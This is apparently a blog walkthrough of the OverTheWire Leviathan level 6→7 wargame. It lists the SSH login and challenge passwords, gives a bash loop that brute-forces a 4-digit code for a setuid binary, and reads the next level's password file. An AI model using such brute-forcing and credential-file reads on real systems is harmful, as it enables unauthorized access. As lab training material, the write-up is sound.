OverTheWire Leviathan Guide

here's how to solve the leviathan level 6 → 7

Back to the Leviathan Guides

Previous Level Guide: Bandit Level 5 → 6

Access

SSH: ssh leviathan6@leviathan.labs.overthewire.org -p 2223

Password: AL5Hmapwi1

Info

Description: There is no information for this level, intentionally.

Theory

Not much to do with the details from the task, so just skipping to doing it.

Solution

First of all, we will use ls -la to see all files regardless they are hidden and some details of the files/folders:

~$ ls -la
total 36
drwxr-xr-x  2 root       root        4096 Sep 19 07:07 .
drwxr-xr-x 83 root       root        4096 Sep 19 07:09 ..
-rw-r--r--  1 root       root         220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root       root        3771 Mar 31  2024 .bashrc
-r-sr-x---  1 leviathan7 leviathan6 15032 Sep 19 07:07 leviathan6
-rw-r--r--  1 root       root         807 Mar 31  2024 .profile

Let's check out this leviathan6 file as it is the only file here:

~$ ./leviathan6
usage: /home/leviathan6/leviathan6 <4 digit code>

So it seems like the program is one of those small versions of the next level's terminal, but to enter, we need a 4-digit code, and it seems like there's nothing that could give us a hint to what it could be, so that brings us to brute forcing it, basically it's entering every single password possible until one works, but typing ten thousand numbers by hand is pretty hard, so we'll do a temporary directory to write some code to do this brute force stuff:

~$ mktemp -d
/tmp/tmp.zB1xrHuD9y

~$ cd /tmp/tmp.zB1xrHuD9y

/tmp/tmp.zB1xrHuD9y$ vim bruteforce.sh

I'm using vim because nano was glitching a bit. Basically we're going to loop through all the numbers from 0000 to 9999, but also using echo to know what number it is. Then after putting this code just use :wq to save and close:

#!/bin/bash

for a in {0000..9999}
do
echo $a
~/leviathan6 $a
done

Now we're going to give it a couple more permissions to access the executable file:

/tmp/tmp.zB1xrHuD9y$ ls
bruteforce.sh

/tmp/tmp.zB1xrHuD9y$ chmod +x bruteforce.sh

/tmp/tmp.zB1xrHuD9y$ ./bruteforce.sh
0000
Wrong
0001
Wrong
0002
Wrong
0003
Wrong
...

Now just wait a couple seconds until you get the $ symbol where you can get the password from the next level, but I will just exit in here to clear my terminal of 20000 lines of numbers and wrongs, the number is the one before the $ symbol like in here:

...
Wrong
7122
Wrong
7123
$ exit
7124
Wrong
...

Now that I've cleared my terminal we can just re-enter into the small next level terminal by just looking at the number on top of the small terminal dollar symbol, like this:

/tmp/tmp.zB1xrHuD9y$ ~/leviathan6 7123
$ whoami
leviathan7

So just like past levels, we'll grab the password from this little thing:

$ cat /etc/leviathan_pass/leviathan7
uTRobztpgO

And that's our password! Now you can exit twice because you are inside the small next level terminal, and then go to the next level.

https://overthewire.org/wargames/leviathan/leviathan7.html
Next Level Guide: Leviathan Level 7 → Level 8

Explore My Website